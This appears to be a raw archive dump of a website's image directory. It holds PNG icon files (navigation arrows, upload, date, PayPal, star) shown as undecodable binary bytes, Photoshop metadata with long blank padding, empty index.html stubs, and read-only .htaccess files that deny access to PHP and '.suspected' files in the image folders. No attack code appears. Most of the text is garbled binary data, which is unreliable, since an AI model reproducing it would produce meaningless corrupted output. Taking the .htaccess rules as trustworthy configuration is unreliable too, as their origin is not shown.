�M=:��.�k���Dw�n��^��Lo��y��}/�T�m���GX�$��<�5qo</���QC]�@C�a�a�ᄑ��<��F�F�i�\�$�m�mƣ&&!&KM�M�RM��)�;L;L���͢�֙5�=1�2��כ߷`ZxZ,����eI��Z�Yn�Z9Y�XUZ]�F���%ֻ�����N�N���gð�ɶ�����ۮ�m�}agbg�Ů��}�}��=
���Z~s�r:V:ޚΜ�?}���/gX���3��)�i�S��Ggg�s�󈋉K��.�>.���Ƚ�Jt�q]�z�������ۯ�6�i�ܟ�4�)�Y3s���C�Q��?��0k߬~OCO�g��#/c/�W�װ��w��a�>�>r��>�<7�2�Y_�7��ȷ�O�o�_��C#�d�z����%g��A�[��z|!��?:�e����A���AA�����!h�쐭!��Α�i�P~���a�a��~'���W�?�p�X�1�5w��Cs�D�D�Dޛg1O9�-J5*>�.j<�7�4�?�.fY��X�XIlK9.*�6nl�������{�/�]py�����.,:�@L�N8��A*��%�w%�
y��g"/�6ш�C\*N�H*Mz�쑼5y$�3�,幄'���L
Lݛ:��v m2=:�1����qB�!M��g�g�fvˬe����n��/��k���Y-
�B��TZ(�*�geWf�͉�9���+��̳�ې7����ᒶ��KW-X潬j9�<qy�
�+�V�<���*m�O��W��~�&zMk�^�ʂ��k�U
�}����]OX/Yߵa���>������(�x��oʿ�ܔ���Ĺd�f�f���-�[����n
�ڴ
�V��E�/��(ۻ��C���<��e����;?T�T�T�T6��ݵa�n��{��4���[���>ɾ�UUM�f�e�I���?�����m]�Nmq����#�׹���=TR��+�G�����w-
6
U����#pDy��	�
:�v�{���vg/jB��F�S��[b[�O�>����z�G��4<YyJ�T�i��ӓg�ό���}~.��`ۢ�{�c��jo�t��E���;�;�\�t���W�W��:_m�t�<���Oǻ�����\k��z��{f���7���y���՞9=ݽ�zo�����~r'��˻�w'O�_�@�A�C݇�?[�����j�w����G�������C���ˆ
��8>99�?r��C�d�&����ˮ/~�����јѡ�򗓿m|�����������x31^�V��w�w��O�| (�h���SЧ�������c3-� cHRMz%������u0�`:�o�_�F-IDATx�b�{������������#�'��	��bB��1b```��U�1���/��B��>Y��LH��ϯ����ab``���Ç�Y��X��BhD1
@��s�+7 1|yw���y�R���f��v��F�_��BO��xzc����^������b#!7���ɧ$�����GLW1���B~}�˻ˌ�̌��FQ�'j�������Ǜ̬ܿ�S0�����g�^���ß��������???0����b##@L$�@W��WF\*�|�j������	I�u�ɟ�^��fa�GQ����gfV��'K�9Ş�Z�����~#T���Vɤ��_��\���p�1f`d�������W�����=��������@���!"��)��.(i'��#��&�������������^삣�'��a
�_6>vAT$�🁁�:ٳ4Ea����46�6�@1�JQPDAw-E��?���Qp�w8��R�N
?�Pc[h�6m�{�C�������'P\��� 5���yMI�"w[�\
Bn������G�|f�\�&����ݱ�]D顰�u�j/gO���ɭ��
s��(�w�P\���\/�7�w��"
�V�O?��(T��csB�P��19�}_APy�А�WsT�H�9@��l$ 涸�p��J���D�/�u��A �;�}��T���F�\׍�nduc-5��Lo�㫾���(��J阳�3Dt�R�ri[W�U�߯�*��bp^�P�����8IEND�B`�images/06/next.png000060400000002045152434416630007727 0ustar00�PNG


IHDR
UEe�tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:FE22B85259C211E385BBFCC2CFBC267A" xmpMM:DocumentID="xmp.did:FE22B85359C211E385BBFCC2CFBC267A"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:FE22B85059C211E385BBFCC2CFBC267A" stRef:documentID="xmp.did:FE22B85159C211E385BBFCC2CFBC267A"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>��XR�IDATx�b���'/g1@:��	�+���k�b�|��OA�
��q&>U12����>M,aQ ��8�4��U��6�����RN��x�Cߧ�8�������h���֩����H0ˈ�@|���Ou��H�#���|����3ѡ�x%IEND�B`�images/06/index.html000060400000000042152434416630010233 0ustar00<!DOCTYPE html><title></title>
images/06/01.png000060400000002536152434416630007176 0ustar00�PNG


IHDR"�k��tEXtSoftwareAdobe ImageReadyq�e<!iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Windows)" xmpMM:InstanceID="xmp.iid:4D42516538A511E38D41CF71947A8BD4" xmpMM:DocumentID="xmp.did:4D42516638A511E38D41CF71947A8BD4"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:4D42516338A511E38D41CF71947A8BD4" stRef:documentID="xmp.did:4D42516438A511E38D41CF71947A8BD4"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>r�z��IDATx��WMj�P�Ę�R#V\�B�.�X)֊F\x�z��u��Lo��n�+*�V�1�yT(--��u���	���|3�}���8�.L\/�ڍFà�
�0�\%b�6L&0�z�k6_�n��j:<��a���iZC���#R�e��hO"pF"��G�;�`0H�k�D$���;�5ND�-�?�M�^�����M�ӐL&wˈ�?ߖ�keB.2��K���!����j��& �E���0��ӈeY {�P��AER�OY6#�(��A�J'�j����C,�hHU*�Mk�8l���M���� �2#X6�Ҿ�=��)ds9��f|'��E��ry�9Bd�K��_�~?#!ỽ%��u]pt,�y$�H�zr}��*G�
j�tt�ɺQGaL�<z�Փ��N����D�'�ŕH��g&
�!��s]ߝk_���
��W�K�`h��f@_�IEND�B`�images/06/.htaccess000044400000000424152434416630010042 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>images/06/01/.htaccess000044400000000424152434416630010262 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>images/06/01/index.html000060400000000042152434416630010453 0ustar00<!DOCTYPE html><title></title>
images/06/01/next.png000060400000002212152434416630010143 0ustar00�PNG


IHDR
UEe�tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:B73A48B759C211E39979E3976F1BB419" xmpMM:DocumentID="xmp.did:B73A48B859C211E39979E3976F1BB419"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:B73A48B559C211E39979E3976F1BB419" stRef:documentID="xmp.did:B73A48B659C211E39979E3976F1BB419"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>_W���IDATx�b,,,l���?��	��������@��q>���L �������}QQQ&>��R����_,,,����Z�Χ���Ȝ��\Q�e{3�������LȜɓ'�R�@.Ʃ.:���������N��fa�S��}����A�T�)(��Z�%1@^F�S����r~`���Q�ĉO��e����~���h�b`*݄ΧE>e����<���L�§:`,((��<���O�� �!�g�{�&IEND�B`�images/06/previous.png000060400000002154152434416630010626 0ustar00�PNG


IHDR
UEe�tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:FA90D80759C111E3B4D69BC3BE0FC11B" xmpMM:DocumentID="xmp.did:FA90D80859C111E3B4D69BC3BE0FC11B"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:FA90D80559C111E3B4D69BC3BE0FC11B" stRef:documentID="xmp.did:FA90D80659C111E3B4D69BC3BE0FC11B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>����IDATxڴԭ
�P��m.�i�
lZ�=�~%����v�`�hj�4�y&� X48��38X;�_xV8{y� ,������Zf&����D��<��AW�oݥ6ʨ��*"7E�\ͅ�x��(I�&�l]S�-\QT���1���d#��v����FJ��a�NJ6R^���쥜5Q�)lE^�㠽4*��(�7)�i�Cg��b�9��8l���IEND�B`�images/06/upload.png000060400000004445152434416630010243 0ustar00�PNG


IHDRB1n��tEXtSoftwareAdobe ImageReadyq�e<!iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Windows)" xmpMM:InstanceID="xmp.iid:3F21A84038A511E38E31A441C8CF5E5F" xmpMM:DocumentID="xmp.did:3F21A84138A511E38E31A441C8CF5E5F"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:3F21A83E38A511E38E31A441C8CF5E5F" stRef:documentID="xmp.did:3F21A83F38A511E38E31A441C8CF5E5F"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>�k�P�IDATx���N#I��}��A ��sE ��`^��}���0o��	$�}��;L}!�U�n�\�;��!m\��GDV���dN|>��Z/=�b�t�9ǹ5G�������BVv������ˬ߿�TVV���,�)Qxxx0'''fmm����ZK߿z���y<��������͕���ܳ����q�55y-&����h"m��䘳��/�##S�h���o{@�gffF,~��"#>>>b��۞k�CF�(A!�?���3;;;�����6J���ToZ[[Mss����w���
��bbbLJJ�[8����{����Å�+�a!�A*ъ�
�M�������J�\^^���Ys���h��녢iii��@�CcqqQ�@xP��z*55����i.V�9���L��...�����3����Gs{{+��������@/�f��8�+�f=##ô���=�9���̌���0GGG���.l©��#4LaG���tcx���%~щ��r��醝�	�N����c�8��>�`6WUUe:;;E@E�jp���#}zzjfgg���P k�
�2����-�.;�u:��.a�8����h�2,q�099Y�K��.���f�F�y�sww�lmm	@��Ŧ��P~%�\���a�������ؘY]]-ihh0mmm���D��M�	<6==-���~2ĴAMs���ڏ	������A�`���z�����q)����LQQQ�|�P��l��'!@6�A�Zpf��dee�,--���k!�>쇕���$`ޥY�x<?AHLNNJQS�������2��u�"Sp���
���ᥥ�Bq�-�!c�
�2�Z� #���I�Ox��$�"�����8���
+��Ь�Q|�{�:�%D(�`��:�p�#�6�Q/Ů�����d��@ҽ�r�9NÔ!�����QN�hHm�N��M�k	~&}�50�<@}�)�����}�h���Ԋ�P�;��
a�f�Q�(�@����D��ML~g��v�\PyMJJ��p| T����%^����?��Ai�a�AD�:���\��F��W�4��]=�dsNi
#XS�T��$�|ץ�T�DGG����xƒ�z�)�3Ɩ�G�C���[�F�'�t�l�tF��C[�ပI����9�5;{`�f'@~�.-�T(U��8&#���C��
!µ�E��ּ?<<,�I<��/`�݀��>�T����
d���%\@(N�\-��,n�R��='K���{4�0�q@���QG�(?q�͑�<��9@���D��w�#��sɑ:����~�z�y8�)�6c;h�����M"��|�w���߭��I����M�k�#�F
q�`���IEND�B`�images/06/date.png000060400000002514152434416630007667 0ustar00�PNG


IHDRԯ,�tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:53507BB937E611E3AD86D5EBF6E4BAB1" xmpMM:DocumentID="xmp.did:53507BBA37E611E3AD86D5EBF6E4BAB1"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:53507BB737E611E3AD86D5EBF6E4BAB1" stRef:documentID="xmp.did:53507BB837E611E3AD86D5EBF6E4BAB1"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>fJh��IDATx�t�M(fa��}�C(&e�Y�a1�ѻ��PM��򖬦ll�}K�RV�$%E�3v�|���/���s��?�s���D"1�i��h4z,_	fV��~<��VB*D`�B�)�
�a~��Q
�Ih�K	�h�0\�>K�f�2a��`� ]��0�	�`~�
�Y6&pa��m��^X�|7�b��#_�����l���Ф�r=�1�P,Գ'_�^����j
tC��I�0c��iD/�xٰ�jc�S��4�o��?���	@-��w9��b[b�+Y�&�E�P��l&����xW�V��,�3�4�h��_�-�^NZ���4޾��6O�r��c���y�����_�4�9z�Of���nKS�S�b�
�U�2'��@��˲MK�C�
͆��u2�U�3���Q�|�1���IEND�B`�images/star_blue.png000060400000001621152434416630010503 0ustar00�PNG


IHDRB �	pHYs�� cHRMz%������u0�`:�o�_�FIDATxڬ��o�U����i��t:�:mm��$jJ?��"хcܨ1��E7�,]�!�.ܹ��������X��
L�C?���~�3��{�
B�v"������y�L�<I�O�W=L5r��=��7%�ѵhdb]�>����<�$=�&�Q́#�K��6�\M��KvQ��<˪t�������3��-�&�+R�9XtD�	*�	l�5�����G��&����n��^`dT��@thEr�Y;�ߠC��[���i�?}ު�5��tR??���H�c�>�m������ɚ��Xsz�X�f��?o	�D���t��VB[�ir�<n�H1/���\��֠i u��0ܑNnKc��W���G�zoQ�����3� 4R�!��u��)j̢	��Žq�]��?Lm[ 
�/�f�_��l��&s�x�k1[�ӽ�*���ܵc��1��,4�#}�usē1��c��LA�=�Y���&���H�}�‡�y��]�&�M��u�~�T���]DP��9�K�!�=15��G�h8dk$��f8"1��~�,UZZ��KqgU��'���ѡ���e�Nj���d�B�~�J?���&IGM2��L���{|�l�.]\���|<�h�l�!ؔf6LKV�>\��I�L���	%����l��
b��If���փ�ҋ�Zz{Yz^�3O�����];R��:�I���2��R�uIW�ˮz��6i�\�N����e񷻂�ƺutY�ӊ���ƭ�+��Uת�Ι�|MQ9EQIEND�B`�images/add.png000060400000043717152434416630007267 0ustar00�PNG


IHDR]�x	pHYs��
OiCCPPhotoshop ICC profilexڝSgTS�=���BK���KoR RB���&*!	J�!��Q�EEȠ�����Q,�
��!��������{�kּ�����>�����H3Q5��B������.@�
$p�d!s�#�~<<+"��x��M��0���B�\���t�8K�@z�B�@F���&S�`�cb�P-`'������{[�!�� e�Dh;��V�EX0fK�9�-0IWfH�����0Q��){`�##x��F�W<�+��*x��<�$9E�[-qWW.(�I+6aa�@.�y�2�4�������x����6��_-��"bb��ϫp@�t~�,/��;�m��%�h^�u��f�@����W�p�~<<E���������J�B[a�W}�g�_�W�l�~<�����$�2]�G�����L�ϒ	�b��G�����"�Ib�X*�Qq�D���2�"�B�)�%�d��,�>�5�j>{�-�]c�K'Xt���o��(�h���w��?�G�%�fI�q^D$.Tʳ?�D��*�A�,����`6�B$��BB
d�r`)��B(�Ͱ*`/�@4�Qh��p.�U�=p�a��(��	A�a!ڈb�X#����!�H�$ ɈQ"K�5H1R�T UH�=r9�\F��;�2����G1���Q=��C��7�F��dt1�����r�=�6��Ыhڏ>C�0��3�l0.��B�8,	�c˱"����V����cϱw�E�	6wB aAHXLXN�H� $4�	7	�Q�'"��K�&���b21�XH,#��/{�C�7$�C2'��I��T��F�nR#�,��4H#���dk�9�, +ȅ����3��!�[
�b@q��S�(R�jJ��4�e�2AU��Rݨ�T5�ZB���R�Q��4u�9̓IK�����hh�i��t�ݕN��W���G���w
��Ljg(�gw��L�Ӌ�T071���oUX*�*|��
�J�&�*/T����ުU�U�T��^S}�FU3S�	Ԗ�U��P�SSg�;���g�oT?�~Y��Y�L�OC�Q��_�� c�x,!k
��u�5�&���|v*�����=���9C3J3W�R�f?�q��tN	�(���~���)�)�4L�1e\k����X�H�Q�G�6����E�Y��A�J'\'Gg����S�Sݧ
�M=:��.�k���Dw�n��^��Lo��y��}/�T�m���GX�$��<�5qo</���QC]�@C�a�a�ᄑ��<��F�F�i�\�$�m�mƣ&&!&KM�M�RM��)�;L;L���͢�֙5�=1�2��כ߷`ZxZ,����eI��Z�Yn�Z9Y�XUZ]�F���%ֻ�����N�N���gð�ɶ�����ۮ�m�}agbg�Ů��}�}��=
���Z~s�r:V:ޚΜ�?}���/gX���3��)�i�S��Ggg�s�󈋉K��.�>.���Ƚ�Jt�q]�z�������ۯ�6�i�ܟ�4�)�Y3s���C�Q��?��0k߬~OCO�g��#/c/�W�װ��w��a�>�>r��>�<7�2�Y_�7��ȷ�O�o�_��C#�d�z����%g��A�[��z|!��?:�e����A���AA�����!h�쐭!��Α�i�P~���a�a��~'���W�?�p�X�1�5w��Cs�D�D�Dޛg1O9�-J5*>�.j<�7�4�?�.fY��X�XIlK9.*�6nl�������{�/�]py�����.,:�@L�N8��A*��%�w%�
y��g"/�6ш�C\*N�H*Mz�쑼5y$�3�,幄'���L
Lݛ:��v m2=:�1����qB�!M��g�g�fvˬe����n��/��k���Y-
�B��TZ(�*�geWf�͉�9���+��̳�ې7����ᒶ��KW-X潬j9�<qy�
�+�V�<���*m�O��W��~�&zMk�^�ʂ��k�U
�}����]OX/Yߵa���>������(�x��oʿ�ܔ���Ĺd�f�f���-�[����n
�ڴ
�V��E�/��(ۻ��C���<��e����;?T�T�T�T6��ݵa�n��{��4���[���>ɾ�UUM�f�e�I���?�����m]�Nmq����#�׹���=TR��+�G�����w-
6
U����#pDy��	�
:�v�{���vg/jB��F�S��[b[�O�>����z�G��4<YyJ�T�i��ӓg�ό���}~.��`ۢ�{�c��jo�t��E���;�;�\�t���W�W��:_m�t�<���Oǻ�����\k��z��{f���7���y���՞9=ݽ�zo�����~r'��˻�w'O�_�@�A�C݇�?[�����j�w����G�������C���ˆ
��8>99�?r��C�d�&����ˮ/~�����јѡ�򗓿m|�����������x31^�V��w�w��O�| (�h���SЧ�������c3-�;�iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42        ">
   <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
      <rdf:Description rdf:about=""
            xmlns:xmp="http://ns.adobe.com/xap/1.0/"
            xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/"
            xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#"
            xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/"
            xmlns:dc="http://purl.org/dc/elements/1.1/"
            xmlns:tiff="http://ns.adobe.com/tiff/1.0/"
            xmlns:exif="http://ns.adobe.com/exif/1.0/">
         <xmp:CreatorTool>Adobe Photoshop CC 2015 (Windows)</xmp:CreatorTool>
         <xmp:CreateDate>2015-11-18T11:57:56+04:00</xmp:CreateDate>
         <xmp:MetadataDate>2015-11-18T11:57:56+04:00</xmp:MetadataDate>
         <xmp:ModifyDate>2015-11-18T11:57:56+04:00</xmp:ModifyDate>
         <xmpMM:InstanceID>xmp.iid:182b3fd4-c445-8d45-b14b-a64a068066a9</xmpMM:InstanceID>
         <xmpMM:DocumentID>adobe:docid:photoshop:1086e913-8dca-11e5-908b-ca098794a1d9</xmpMM:DocumentID>
         <xmpMM:OriginalDocumentID>xmp.did:e8976a35-fae5-ba43-90ae-ce6dcc1235be</xmpMM:OriginalDocumentID>
         <xmpMM:History>
            <rdf:Seq>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>created</stEvt:action>
                  <stEvt:instanceID>xmp.iid:e8976a35-fae5-ba43-90ae-ce6dcc1235be</stEvt:instanceID>
                  <stEvt:when>2015-11-18T11:57:56+04:00</stEvt:when>
                  <stEvt:softwareAgent>Adobe Photoshop CC 2015 (Windows)</stEvt:softwareAgent>
               </rdf:li>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>saved</stEvt:action>
                  <stEvt:instanceID>xmp.iid:182b3fd4-c445-8d45-b14b-a64a068066a9</stEvt:instanceID>
                  <stEvt:when>2015-11-18T11:57:56+04:00</stEvt:when>
                  <stEvt:softwareAgent>Adobe Photoshop CC 2015 (Windows)</stEvt:softwareAgent>
                  <stEvt:changed>/</stEvt:changed>
               </rdf:li>
            </rdf:Seq>
         </xmpMM:History>
         <photoshop:DocumentAncestors>
            <rdf:Bag>
               <rdf:li>adobe:docid:photoshop:ddea4be5-8d02-11e5-908b-ca098794a1d9</rdf:li>
               <rdf:li>xmp.did:5b1e03dd-38d0-394b-b3ea-4c4867364d27</rdf:li>
               <rdf:li>xmp.did:90eaadfa-1016-ed46-82dd-4ae7a991a8dc</rdf:li>
               <rdf:li>xmp.did:f562aca2-fc36-4c47-8294-8d2eaade51e7</rdf:li>
            </rdf:Bag>
         </photoshop:DocumentAncestors>
         <photoshop:ColorMode>3</photoshop:ColorMode>
         <photoshop:ICCProfile>sRGB IEC61966-2.1</photoshop:ICCProfile>
         <dc:format>image/png</dc:format>
         <tiff:Orientation>1</tiff:Orientation>
         <tiff:XResolution>720000/10000</tiff:XResolution>
         <tiff:YResolution>720000/10000</tiff:YResolution>
         <tiff:ResolutionUnit>2</tiff:ResolutionUnit>
         <exif:ColorSpace>1</exif:ColorSpace>
         <exif:PixelXDimension>31</exif:PixelXDimension>
         <exif:PixelYDimension>27</exif:PixelYDimension>
      </rdf:Description>
   </rdf:RDF>
</x:xmpmeta>
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                            
<?xpacket end="w"?>�N�x cHRMz%������u0�`:�o�_�FIDATx��1KQ�g��]0� �b���66"�bo���Z�,��{�إ"�X9���7B�:����bYX�c��ë{đ:�������~��u{|��^�B7���H���֏׻�,Q$����nm.vD�"�2��5�R�b�G��-�$���U�"����SM��q{QZ��:.�[US@D��T�\<��*A';{�K׃�������_�އ
��/�#?��IU&5=��G���C�I��>����W�޼2�IEND�B`�images/paypal.png000060400000005624152434416630010020 0ustar00�PNG


IHDR**���[tEXtSoftwareAdobe ImageReadyq�e<!iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Windows)" xmpMM:InstanceID="xmp.iid:22F90752C7F611E4A8CFCD0B623B5A7E" xmpMM:DocumentID="xmp.did:22F90753C7F611E4A8CFCD0B623B5A7E"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:22F90750C7F611E4A8CFCD0B623B5A7E" stRef:documentID="xmp.did:22F90751C7F611E4A8CFCD0B623B5A7E"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>I)��	IDATx��Y{P\���}�@�$@@A 45И��&68�u�1��1c�1i:�$�f2�b�n��әکNG�V;qjIu&�&�vŐL��"�;�#�BX��>{η����.��=3���ݻ���y��2,U��,Z�I�#-%��TO�Jj%u�v����'=�c����8�"��h}�t7�V�rx=����i0H�;�I�
eH����::����@{�h��#=D(�1����wj�Q%j�
$iM�2��`b�M�ҿ�V
pNȒX���FW��۱<�F��(�4�	7'Z�*4�q��.SH��O�[�4��
���@@M؁�J?�.�[P������N�D�W�2
�m(�W��j4=)����ķ*��V����5�5��im w���:�>�ښ�Y�<��ޥX4�n���Ƣ;q�(��f���ӽ�C��ۜn�N���?����k��$��No��䷡K��+ڢF�.Z��E2�eD�G�=�=U-�Xg��p�p��'��������7l6��
��4�LM�ڬ�K���x���Q^��b�a/2��f���<��LGa�1����&����vN�~a��G���R�+Y(ݼ+��ջ1�ZP�)���H�M����:����Dlj�T�>��7��p�)lќ;V�<z����g}�NZ�$S�۳�`���n�(�Y�,V;���S�O'ac��}�8��_ uƬ�SuZa����|p�Z̄����w������m�.(~��"Y�
�k�]�sȈt
�bx"���l�	~G��;E�V�mc��j�5<+=�()+�<[/�d�HAFJr�q�V�����%���H��
Z
�L��͂9nd9���5��(F�WE_�j�؄p�/���|��P���r2����(#k*�����$���ZIf�O�W�Ň�F��-���֋�,^�z��2�=gd&�Z��:��g;��{E�1���Ϟ�%"q�J%���]]����/��k���uH7��3l����cG�@S���Q"}�ݙ%T�и�HS�)�4';~�A���K�T�+��=NJ<�ٔH��t��9��̳��ĹUi�a���}��"ݤ�v]�c��SĆLB�bj�rA�,�􎌡��g�l��ދ~K�[�����{߳^|�$
��@����=d�\�ޘVFǧ�2��g����? ʦ�����)gv���#���س��^����ǥ]��䕁�B��"U>uT+�F�?q�IT$6��2R�l-6�`si�-)e�i�����ި��-�.�z��kd��P� E��ğ�{Ε�]$[��ne�g��2���Z
���W?�\T���6��b��A�&�8�ݑ22O΍���Aq�����B�<^�]S��p�1����#��֍S�_����\���;}���ԃ�ɯ.�}�<��8/�ǟ9� Uek�_�|��G�Sr��>a�q"�`p	D��+\

